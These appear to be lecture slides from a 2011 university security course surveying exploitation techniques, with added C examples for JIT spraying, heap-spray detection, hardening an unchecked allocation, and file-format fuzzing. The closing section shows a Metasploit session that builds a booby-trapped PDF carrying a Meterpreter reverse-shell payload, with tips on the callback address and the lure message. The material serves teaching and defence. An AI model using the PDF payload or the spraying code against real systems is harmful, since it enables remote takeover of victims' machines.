EECS 354: A Survey of Techniques to Facilitate Exploitation
Jonathan Friedman, Max Goldman, Brian Lange, Josiah Matlack, Aaron Steinfeld
November 29, 2011


Overview

JIT Spraying
Heap Spraying
Application-specific Exploits
Decompilers
File Format Vulnerabilities
Demo


JIT Spraying

Introduced by Dionysus Blazakis in 2010

Designed to overcome ASLR and DEP
▪ JIT-emitted code lives in executable memory, so DEP does not stop it from running
▪ "Spraying" covers the heap in exploit code, so an approximate address is enough despite ASLR
Demonstrated in ActionScript (Flash) code
▪ Predictable address space layout
Works by chaining XOR operations: the attacker picks the 32-bit constants, the JIT emits them as immediates, and read one byte in from the start of the emitted code those immediates are the shellcode


JIT Spraying (cont)

var y = ( 0x3c54d0d9 ^ 0x3c909058 ^ 0x3c59f46a ^ 0x3c90c801 ^ 0x3c9030d9 ^ 0x3c53535b )

03470069 B8 D9D0543C    MOV EAX,3C54D0D9
0347006E 35 5890903C    XOR EAX,3C909058
03470073 35 6AF4593C    XOR EAX,3C59F46A
03470078 35 01C8903C    XOR EAX,3C90C801
0347007D 35 D930903C    XOR EAX,3C9030D9
03470082 35 5B53533C    XOR EAX,3C53535B


JIT Spraying (cont)

var y = ( 0x3c54d0d9 ^ 0x3c909058 ^ 0x3c59f46a ^ 0x3c90c801 ^ 0x3c9030d9 ^ 0x3c53535b )

Same bytes, entered one byte later (at 0347006A instead of 03470069):

0347006A D9D0     FNOP
0347006C 54       PUSH ESP
0347006D 3C 35    CMP AL, 35
0347006F 58       POP EAX
03470070 90       NOP
03470071 90       NOP
03470072 3C 35    CMP AL, 35
03470074 6A F4    PUSH -0C
03470076 59       POP ECX
03470077 3C 35    CMP AL, 35
03470079 01C8     ADD EAX, ECX
0347007B 90       NOP
0347007C 3C 35    CMP AL, 35
0347007E D930     FSTENV DS:[EAX]

Each constant's high byte 3C, followed by the 35 opcode of the next XOR, decodes as the harmless CMP AL, 35, which keeps the unintended instruction stream in sync.


JIT Spraying (cont)

Defenses exist
Signature detection
▪ Looks for NOPs
▪ High false-positive rate
Heuristics
▪ Look at the XORed values
▪ Stateful
▪ Look for short jumps
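The packing trick on the two previous slides, and the "look at the XORed values" heuristic above, as an added example in C. This is not Blazakis's tool or Flash's JIT; it models the 32-bit x86 encoding the slide disassembles (B8 imm32 = MOV EAX,imm32, 35 imm32 = XOR EAX,imm32), packs three shellcode bytes per constant under a 0x3C high byte, reads the payload back at offset +1, and flags a long XOR chain whose immediates all share one high byte. The 18-byte shellcode, the chain-length threshold and the detector are constructed for the example.

```c
/* Added example (not Blazakis's tool or Flash's JIT): packing shellcode into
 * the constants of an ActionScript XOR chain, emitting the 32-bit x86 bytes
 * the slide's disassembly shows, reading the payload back at offset +1, and
 * a toy version of the "look at the XORed values" heuristic. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define SYNC_BYTE      0x3C  /* high byte of every constant; "3C 35" decodes as CMP AL,35 */
#define XOR_OPCODE     0x35
#define MOV_EAX_OPCODE 0xB8

/* Three payload bytes per constant: low 24 bits are payload, high byte is 0x3C. */
uint32_t pack_constant(const uint8_t chunk[3])
{
    return ((uint32_t)SYNC_BYTE << 24) | ((uint32_t)chunk[2] << 16) |
           ((uint32_t)chunk[1] << 8) | chunk[0];
}

/* Pack a shellcode buffer; the last chunk is padded with NOP (0x90).
 * out needs (len + 2) / 3 entries; returns the number of constants. */
size_t pack_shellcode(const uint8_t *sc, size_t len, uint32_t *out)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i += 3) {
        uint8_t chunk[3] = { 0x90, 0x90, 0x90 };
        memcpy(chunk, sc + i, len - i < 3 ? len - i : 3);
        out[n++] = pack_constant(chunk);
    }
    return n;
}

/* What the JIT emits for "c0 ^ c1 ^ ... ^ cn-1": MOV EAX,c0 then XOR EAX,ci,
 * 5 bytes each, immediate little-endian. Returns bytes written (5 * n). */
size_t emit_jit(const uint32_t *consts, size_t n, uint8_t *out)
{
    size_t pos = 0;
    for (size_t i = 0; i < n; i++) {
        out[pos++] = (i == 0) ? MOV_EAX_OPCODE : XOR_OPCODE;
        for (int b = 0; b < 4; b++)
            out[pos++] = (uint8_t)(consts[i] >> (8 * b));
    }
    return pos;
}

/* Sync check: from offset 1, every 5-byte group is 3 payload bytes followed
 * by 3C 35 (CMP AL,35), which swallows the real XOR opcode and keeps the
 * unintended instruction stream aligned. */
int offset1_is_aligned(const uint8_t *jit, size_t len)
{
    if (len < 5 || jit[0] != MOV_EAX_OPCODE)
        return 0;
    for (size_t p = 4; p + 1 < len; p += 5)
        if (jit[p] != SYNC_BYTE || jit[p + 1] != XOR_OPCODE)
            return 0;
    return 1;
}

/* Read the payload back from offset 1, skipping each 3C 35 pair. */
size_t extract_payload(const uint8_t *jit, size_t len, uint8_t *out)
{
    size_t n = 0;
    for (size_t p = 1; p + 2 < len; p += 5) {
        out[n++] = jit[p];
        out[n++] = jit[p + 1];
        out[n++] = jit[p + 2];
    }
    return n;
}

/* Toy form of the "look at the XORed values" heuristic: a chain of at least
 * min_chain XORs whose immediates all share the same high byte is flagged.
 * Benign code rarely XORs many constants with an identical top byte, but the
 * threshold is an assumption for this example, not a production detector. */
int xor_chain_looks_sprayed(const uint32_t *consts, size_t n, size_t min_chain)
{
    if (n < min_chain)
        return 0;
    uint8_t top = (uint8_t)(consts[0] >> 24);
    for (size_t i = 1; i < n; i++)
        if ((uint8_t)(consts[i] >> 24) != top)
            return 0;
    return 1;
}

int main(void)
{
    /* The six constants from the slide. */
    const uint32_t page_consts[] = { 0x3c54d0d9, 0x3c909058, 0x3c59f46a,
                                     0x3c90c801, 0x3c9030d9, 0x3c53535b };
    uint8_t jit[5 * 6];
    size_t n = emit_jit(page_consts, 6, jit);
    printf("JIT output:");
    for (size_t i = 0; i < n; i++)
        printf(" %02X", jit[i]);
    printf("\naligned at +1: %d, flagged by heuristic: %d\n",
           offset1_is_aligned(jit, n), xor_chain_looks_sprayed(page_consts, 6, 4));
    return 0;
}
```

The emitted byte stream for the slide's constants starts B8 D9 D0 54 3C 35 58 90 90 3C ..., exactly the listing on the earlier slide; any payload byte that itself equals 0x3C or 0x35 still decodes correctly, since alignment depends only on the fixed high byte and the opcode.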


Heap Spraying

Companion to a heap (or other memory-corruption) exploit, used to overcome address space randomization

Allocates many "blocks" throughout the heap, each containing a NOP sled followed by the malicious code

Increases the chance that a hijacked control transfer lands somewhere in a sled and slides into the malicious code, so the attacker needs only an approximate address

Heap Spraying (cont): diagram slide (image not preserved in this extraction)

NOZZLE: Heap Spraying Defense

Developed by Microsoft Research in 2008

Defends against heap spraying by:
1. Scanning each individual object on the heap, looking for NOP sleds followed by shellcode
2. Looking for heaps with a high proportion of such malicious objects
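The spray on the Heap Spraying slides and the two NOZZLE checks above, as an added example in C. It is not NOZZLE's code: the sprayer fills simulated heap objects with a sled plus payload, the detector implements check 1 as a plain "leading run of 0x90 followed by something else" signature and check 2 as the fraction of flagged objects. The object count, sizes, sled threshold and alarm threshold are assumptions for the example; the real NOZZLE disassembles each object from every offset rather than matching a byte pattern, which is why the signature version here inherits the false-positive problem the JIT slide mentions.

```c
/* Added example, not NOZZLE's code: a simulated heap spray and the two
 * checks the slide lists, (1) per-object "NOP sled followed by shellcode"
 * and (2) a heap-wide ratio of flagged objects. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define NOP         0x90
#define OBJ_SIZE    4096   /* assumed object size */
#define NUM_OBJECTS 8      /* assumed heap size for the scenario */

/* Sprayer side: one block = sled of sled_len NOPs, then the payload.
 * Returns the block length, or 0 if it does not fit. */
size_t build_spray_block(uint8_t *out, size_t cap, size_t sled_len,
                         const uint8_t *payload, size_t plen)
{
    if (sled_len + plen > cap)
        return 0;
    memset(out, NOP, sled_len);
    memcpy(out + sled_len, payload, plen);
    return sled_len + plen;
}

/* Detector side, check 1: length of the leading single-byte-NOP run. */
size_t leading_nop_run(const uint8_t *obj, size_t len)
{
    size_t run = 0;
    while (run < len && obj[run] == NOP)
        run++;
    return run;
}

/* Flag an object whose sled is at least min_sled bytes and is followed by
 * something (a sled with nothing after it is just padding). Matching on
 * 0x90 is cheap but false-positives on any buffer that happens to hold a
 * long run of 0x90, and misses sleds built from other one-byte instructions. */
int object_looks_sprayed(const uint8_t *obj, size_t len, size_t min_sled)
{
    size_t run = leading_nop_run(obj, len);
    return run >= min_sled && run < len;
}

/* Check 2: fraction of flagged objects across the whole heap. */
double sprayed_fraction(uint8_t objs[][OBJ_SIZE], const size_t *lens,
                        size_t n, size_t min_sled)
{
    size_t flagged = 0;
    for (size_t i = 0; i < n; i++)
        if (object_looks_sprayed(objs[i], lens[i], min_sled))
            flagged++;
    return n ? (double)flagged / (double)n : 0.0;
}

int heap_alarm(double fraction, double threshold)
{
    return fraction >= threshold;
}

/* Constructed scenario: 6 of 8 objects are sprayed blocks, 2 hold ordinary
 * string data. Returns the flagged fraction (6/8 = 0.75). */
double demo_sprayed_fraction(size_t min_sled)
{
    static uint8_t heap[NUM_OBJECTS][OBJ_SIZE];
    size_t lens[NUM_OBJECTS];
    const uint8_t payload[] = { 0xCC, 0xCC, 0xCC, 0xCC }; /* stand-in shellcode (INT3s) */
    const char *text = "ordinary string data living on the heap";

    for (size_t i = 0; i < NUM_OBJECTS; i++) {
        if (i < 6) {
            lens[i] = build_spray_block(heap[i], OBJ_SIZE, OBJ_SIZE - sizeof payload,
                                        payload, sizeof payload);
        } else {
            lens[i] = strlen(text);
            memcpy(heap[i], text, lens[i]);
        }
    }
    return sprayed_fraction(heap, lens, NUM_OBJECTS, min_sled);
}

int main(void)
{
    double f = demo_sprayed_fraction(256);
    printf("flagged fraction %.2f, alarm at 0.50: %d\n", f, heap_alarm(f, 0.5));
    return 0;
}
```

Check 2 is what keeps check 1 usable: a single object with a long 0x90 run is weak evidence, but a heap where most objects look like that is not something benign code produces.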


Application-specific Exploits

Exploit a vulnerability specific to one application to corrupt memory

Can be quite complex and difficult to prevent or debug

To help prevent these exploits, test code extensively
▪ Error codes are your friend: check them


Application-specific Exploits (cont)

Example: Adobe Flash
▪ A parameter can be set to a negative value
▪ This guarantees a failed allocation, and the return value is never checked
▪ The program then does pointer arithmetic between this (now NULL) pointer and a user-supplied value
▪ Result: the user can write to memory at an address of their choosing, relative to NULL
▪ But this isn't directly useful, because the value written is only marginally of the attacker's choosing

So what do we do?
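The unchecked-allocation pattern from the Flash example, as an added C example that models the bug rather than reproducing Flash's code: a signed count goes negative, malloc fails, nothing checks for NULL, and a later indexed write lands at an address the user controls. The hardened version beside it validates the parameter, checks the allocation and bounds-checks every index. The table structure, MAX_ENTRIES and the function names are assumptions for the example; the vulnerable write is computed as an integer rather than performed, so the program does not crash.

```c
/* Added example modelling the slide's pattern, not Flash's code: a size
 * parameter that can go negative, an allocation whose result is never
 * checked, and pointer arithmetic on the resulting NULL with a
 * user-controlled index. The hardened version is beside it. */
#include <stdint.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>

#define MAX_ENTRIES 65536   /* assumed upper bound for the hardened version */

typedef struct {
    uint32_t *entries;
    int32_t   count;        /* signed, as the vulnerable code treats it */
} table;

/* Vulnerable: a negative count converts to a huge size_t, malloc fails and
 * returns NULL, and nothing checks for it. */
void vuln_init(table *t, int32_t count)
{
    t->count = count;
    t->entries = malloc((size_t)count * sizeof(uint32_t));   /* no NULL check */
}

/* Where a later t->entries[idx] = v would land. Computed as an integer, so
 * the demo never dereferences NULL; with entries == NULL the address is
 * simply idx * 4, i.e. attacker-chosen, while the value written is not. */
uintptr_t vuln_write_target(const table *t, int32_t idx)
{
    return (uintptr_t)t->entries + (uintptr_t)(intptr_t)idx * sizeof(uint32_t);
}

/* Hardened: reject non-positive or oversized counts, check the allocation,
 * and bounds-check every index against the recorded count. */
int safe_init(table *t, int32_t count)
{
    t->entries = NULL;
    t->count = 0;
    if (count <= 0 || count > MAX_ENTRIES)
        return -1;                  /* bad parameter: error code, caller must check */
    t->entries = calloc((size_t)count, sizeof(uint32_t));
    if (t->entries == NULL)
        return -1;                  /* allocation failure: error code, caller must check */
    t->count = count;
    return 0;
}

int safe_write(table *t, uint32_t idx, uint32_t v)
{
    if (t->entries == NULL || idx >= (uint32_t)t->count)
        return -1;
    t->entries[idx] = v;
    return 0;
}

int safe_read(const table *t, uint32_t idx, uint32_t *out)
{
    if (t->entries == NULL || idx >= (uint32_t)t->count)
        return -1;
    *out = t->entries[idx];
    return 0;
}

void table_free(table *t)
{
    free(t->entries);
    t->entries = NULL;
    t->count = 0;
}

int main(void)
{
    table v, s;
    vuln_init(&v, -1);              /* attacker-controlled negative size */
    printf("vulnerable: entries=%p, write to index 0x1000 lands at 0x%lx\n",
           (void *)v.entries, (unsigned long)vuln_write_target(&v, 0x1000));
    int r1 = safe_init(&s, -1);
    int r2 = safe_init(&s, 16);
    int r3 = safe_write(&s, 16, 7);
    printf("hardened: init(-1) -> %d, init(16) -> %d, write(16) -> %d\n", r1, r2, r3);
    table_free(&s);
    return 0;
}
```

Note that the hardened code gains nothing if its callers ignore the -1 it returns; the slide's "check them" applies at every call site.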


Application-specific Exploits (cont)

Example (cont): ActionScript VM
▪ A Flash file can also carry ActionScript, which the ActionScript VM executes
▪ The VM verifies its input using bitmasks read from memory, then executes the verified code directly
▪ Overwriting those bitmasks with the previous write primitive lets unverified code execute
▪ Now save the return address (EIP) on the stack, replace it with a chosen pointer, and execute a return to jump to that pointer (presumably shellcode loaded from the Flash file)
▪ Then restore the saved return address and return as if nothing happened


Decompilers

Decode the binary-file format

Decode the machine instructions into assembly code for that machine

Perform semantic analysis to recover some low-level data types such as long variables, and to simplify the decoded instructions based on their semantics


Decompilers (cont)

Store the information in a suitable intermediate representation
▪ If a suitable intermediate language is used, the next two steps can be used with any assembly language to generate any procedural HLL code

Perform data flow analysis to remove low-level aspects of the intermediate representation that do not exist in HLLs, e.g. registers, condition codes, stack references.


Decompilers (cont)

Perform control flow analysis to recover the control structures available in each procedure (i.e. loops, conditionals and their nesting level)

Perform type analysis to recover HLL data types such as arrays and structures.

Generate HLL code from the transformed intermediate code.

Decompilers (cont): diagram slide (image not preserved in this extraction)

File Format Vulnerabilities
In the news…
▪ Duqu: its installer was recently found in the form of a .doc file
▪ iOS jailbreaks: have taken advantage of PDF and TIFF handling vulnerabilities


File Format Vulnerabilities (cont)
At their most abstract level: things handle files. Specially craft the file, and you may be able to manipulate the thing.
▪ Things: programs, OSs
▪ Files: documents, images, videos
▪ Manipulate: crash, reverse engineer, execute arbitrary code


Why so popular?

1. They're more stealthy: a document or image draws less suspicion than an executable.

2. They're getting easier to do.


Tools of the Trade

File format fuzzers: 4f and Metasploit
▪ Brute-force approach: take a valid file, mutate it over and over, feed each variant to the parser, and watch for crashes
Metasploit can also be used to automate the attack end to end, as usual, even for kids!
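The brute-force fuzzing approach above, as an added C example that is neither 4f nor Metasploit's fuzzer. A toy "IMG1" format (magic, 32-bit little-endian body length, body) and a parser whose length check wraps stand in for the target; the mutator enumerates every single-bit flip and every "interesting" 32-bit value at every offset, and the campaign counts mutants that would have read past the buffer. The format, the seed file, the interesting-value list and the crash stand-in are all constructed for the example. A fixed parser is included so the same campaign shows the bug gone.

```c
/* Added example of brute-force file-format fuzzing; not 4f or Metasploit's
 * fuzzer. A toy "IMG1" parser with a length check that wraps stands in for
 * the target, the mutator enumerates every single-bit flip and every
 * "interesting" 32-bit value at every offset, and the campaign counts
 * inputs that would have read out of bounds. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define PARSE_OK     0
#define PARSE_REJECT 1
#define PARSE_CRASH  2   /* stands in for the out-of-bounds read a real parser would do */

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Format: "IMG1" magic, 32-bit little-endian body length, body bytes.
 * Vulnerable parser: body + 8 wraps when body is near UINT32_MAX, so the
 * size check passes and the copy that follows would read past the buffer. */
int parse_vuln(const uint8_t *buf, size_t len)
{
    if (len < 8 || memcmp(buf, "IMG1", 4) != 0)
        return PARSE_REJECT;
    uint32_t body = le32(buf + 4);
    uint32_t total = body + 8;               /* BUG: integer wrap */
    if (total > len)
        return PARSE_REJECT;
    if ((size_t)body > len - 8)
        return PARSE_CRASH;                  /* memcpy(dst, buf + 8, body) would overread here */
    return PARSE_OK;
}

/* Fixed parser: compare the length against the bytes remaining, no addition. */
int parse_fixed(const uint8_t *buf, size_t len)
{
    if (len < 8 || memcmp(buf, "IMG1", 4) != 0)
        return PARSE_REJECT;
    uint32_t body = le32(buf + 4);
    if ((size_t)body > len - 8)
        return PARSE_REJECT;
    return PARSE_OK;
}

/* Constructed list of boundary values worth trying in any 32-bit field. */
static const uint32_t interesting[] = { 0x00000000u, 0x7FFFFFFFu, 0x80000000u, 0xFFFFFFFFu };
#define N_INTERESTING (sizeof interesting / sizeof interesting[0])

/* Number of deterministic mutants: one per bit, plus one per (offset, value). */
size_t mutant_count(size_t len)
{
    return len * 8 + (len >= 4 ? (len - 3) * N_INTERESTING : 0);
}

/* Write mutant number `index` of `seed` into `out` (same length). */
void make_mutant(const uint8_t *seed, size_t len, size_t index, uint8_t *out)
{
    memcpy(out, seed, len);
    if (index < len * 8) {                           /* single-bit flip */
        out[index / 8] ^= (uint8_t)(1u << (index % 8));
        return;
    }
    index -= len * 8;                                /* interesting dword at an offset */
    size_t off = index / N_INTERESTING;
    uint32_t v = interesting[index % N_INTERESTING];
    for (int b = 0; b < 4; b++)
        out[off + b] = (uint8_t)(v >> (8 * b));
}

/* Run every mutant through a parser; return how many "crashed" and keep the
 * first crashing input if first_crash is non-NULL. */
size_t fuzz_campaign(int (*parser)(const uint8_t *, size_t),
                     const uint8_t *seed, size_t len, uint8_t *first_crash)
{
    uint8_t buf[256];
    size_t crashes = 0, n = mutant_count(len);
    if (len > sizeof buf)
        return 0;
    for (size_t i = 0; i < n; i++) {
        make_mutant(seed, len, i, buf);
        if (parser(buf, len) == PARSE_CRASH) {
            if (crashes == 0 && first_crash)
                memcpy(first_crash, buf, len);
            crashes++;
        }
    }
    return crashes;
}

/* Constructed seed: a valid 24-byte file with a 16-byte body. */
static const uint8_t seed_file[24] = { 'I', 'M', 'G', '1', 16, 0, 0, 0,
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };

int main(void)
{
    uint8_t crash[24] = { 0 };
    size_t c = fuzz_campaign(parse_vuln, seed_file, sizeof seed_file, crash);
    printf("%zu of %zu mutants crash the vulnerable parser; first has length field 0x%08X\n",
           c, mutant_count(sizeof seed_file), le32(crash + 4));
    printf("%zu crash the fixed parser\n",
           fuzz_campaign(parse_fixed, seed_file, sizeof seed_file, NULL));
    return 0;
}
```

The only mutant that gets through is the length field set to 0xFFFFFFFF: bit flips make the length larger and are rejected, but a value that wraps past zero slips under the check. Against a real parser the harness would run the target in a child process and treat a signal as the crash.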


Prevention

1. Don't be stupid: don't open files from sources you don't trust.

2. Client-side antivirus

3. Keep software up to date


PDF Exploit Using Metasploit

Metasploit's adobe_pdf_embedded_exe module embeds an executable in an existing .pdf; when the document is opened, the reader shows the module's LAUNCH_MESSAGE prompt and the executable runs once the user presses Open

Exploited on Windows XP SP3, with Adobe Reader 8.0 and below

Also works on Foxit Reader

After the .pdf is opened (and the prompt accepted), the embedded .exe runs automatically


Exploit code

msf exploit(adobe_pdf_embedded_exe) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_pdf_embedded_exe) > set LHOST localhost
LHOST => localhost
msf exploit(adobe_pdf_embedded_exe) > set INFILENAME test.pdf
INFILENAME => test.pdf
msf exploit(adobe_pdf_embedded_exe) > exploit

[*] Started reverse handler
[*] Reading in 'test.pdf'...
[*] Parseing 'test.pdf'...
[*] Parseing Successfull.
[*] Using 'windows/meterpreter/reverse_tcp' as payload...
[*] Creating 'evil.pdf' file...
[*] Generated output file /home/jwm903/.msf3/modules/exploits/data/exploits/evil.pdf
[*] Exploit completed, but no session was created.

LHOST is the address the reverse_tcp payload connects back to, so "localhost" only works for a same-machine demo; against a real target it must be the attacker's reachable IP. "No session was created" is the expected result here: this module only generates the file, and a session appears once a victim opens it while a handler is listening.


Additional Options

EXENAME: the name of the payload exe
FILENAME: the output filename (default: evil.pdf)
INFILENAME: the input PDF filename
LAUNCH_MESSAGE: the message to display in the File: area (default: To view the encrypted content please tick the "Do not show this message again" box and press Open.)
ContextInformationFile: the information file that contains context information
DisablePayloadHandler: disable the handler code for the selected payload
EXE::Custom: use a custom exe instead of automatically generating a payload exe
EXE::FallBack: use the default template in case the specified one is missing
EXE::Inject: set to preserve the original EXE function
EXE::OldMethod: set to use the substitution EXE generation method
EXE::Path: the directory in which to look for the executable template
EXE::Template: the executable template file name
EnableContextEncoding: use transient context when encoding payloads
VERBOSE: enable detailed status messages
WORKSPACE: specify the workspace for this module
WfsDelay: additional delay when waiting for a session


DEMO